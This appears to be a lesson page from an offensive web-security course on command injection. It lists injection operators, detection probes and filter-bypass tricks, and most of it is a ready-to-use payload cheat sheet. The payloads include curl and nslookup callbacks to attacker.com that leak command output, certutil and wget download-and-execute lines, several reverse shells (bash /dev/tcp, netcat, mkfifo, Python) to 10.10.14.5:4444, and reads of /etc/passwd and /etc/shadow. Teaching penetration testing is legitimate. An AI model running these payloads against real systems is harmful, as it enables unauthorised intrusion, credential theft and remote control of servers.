Web Application Attacks
Command Injection
4 min read
Command injection allows attackers to execute system commands on the target server. This vulnerability is common in web applications that process user input.
Understanding Command Injection
Vulnerable code passes user input directly to system commands:
// Vulnerable PHP
$output = shell_exec("ping -c 4 " . $_GET['ip']);
// With input: 127.0.0.1; cat /etc/passwd
// Becomes: ping -c 4 127.0.0.1; cat /etc/passwd
Command Injection Operators
Linux Operators
| Operator | Description | Example |
|---|---|---|
; |
Command separator | ; whoami |
&& |
AND (second runs if first succeeds) | && whoami |
|| |
OR (second runs if first fails) | || whoami |
| |
Pipe output | | whoami |
` |
Command substitution | `whoami` |
$() |
Command substitution | $(whoami) |
\n |
Newline | %0a whoami |
Windows Operators
| Operator | Description | Example |
|---|---|---|
& |
Command separator | & whoami |
&& |
AND | && whoami |
|| |
OR | || whoami |
| |
Pipe | | whoami |
Testing for Command Injection
Basic Detection
; id
; whoami
& id
&& id
| id
|| id
`id`
$(id)
Blind Command Injection
When output isn't displayed, use time-based detection:
# Linux
; sleep 5
& sleep 5
| sleep 5
$(sleep 5)
# Windows
& ping -n 5 127.0.0.1
| ping -n 5 127.0.0.1
Out-of-Band Detection
# DNS callback (Linux)
; nslookup attacker.com
; curl http://attacker.com/$(whoami)
# DNS callback (Windows)
& nslookup attacker.com
& certutil -urlcache -split -f http://attacker.com/
Exploitation Techniques
Direct Shell
# Linux reverse shell
; bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
# URL encoded version
%3B%20bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.5%2F4444%200%3E%261'
File Download and Execute
# Linux
; wget http://10.10.14.5/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh
# Windows
& certutil -urlcache -split -f http://10.10.14.5/nc.exe C:\Windows\Temp\nc.exe & C:\Windows\Temp\nc.exe -e cmd.exe 10.10.14.5 4444
Bypassing Filters
Space Bypass
# Using $IFS (Internal Field Separator)
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
# Using tabs
cat%09/etc/passwd
# Using brace expansion
{cat,/etc/passwd}
Keyword Bypass
# Breaking up commands
wh$()oami
wh``oami
who$@ami
# Using variables
a=wh;b=oami;$a$b
# Base64 encoding
echo "d2hvYW1p" | base64 -d | bash
Quote Bypass
# Single quotes
w'h'o'am'i
# Double quotes
w"h"o"am"i
# Backslash
w\ho\am\i
Common Vulnerable Functions
PHP
system()
exec()
shell_exec()
passthru()
popen()
proc_open()
pcntl_exec()
Python
os.system()
os.popen()
subprocess.call()
subprocess.run()
subprocess.Popen()
Node.js
child_process.exec()
child_process.spawn()
child_process.execSync()
Command Injection Payloads
Linux Enumeration
; id
; whoami
; uname -a
; cat /etc/passwd
; cat /etc/shadow
; ls -la /home
; env
; ps aux
Windows Enumeration
& whoami
& hostname
& ipconfig
& net user
& net localgroup administrators
& systeminfo
& dir C:\Users
Reverse Shell Payloads
# Linux bash
; bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
# Linux netcat
; nc -e /bin/bash 10.10.14.5 4444
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f
# Python
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Command Injection Workflow
1. Identify input vectors
└── Form fields, URL parameters, headers
2. Test with simple operators
└── ; id, | id, & whoami
3. Check for blind injection
└── sleep commands, DNS callbacks
4. Bypass filters if needed
└── Encoding, $IFS, command breaking
5. Escalate to shell
└── Reverse shell, file upload
Next, we'll cover file inclusion vulnerabilities (LFI/RFI). :::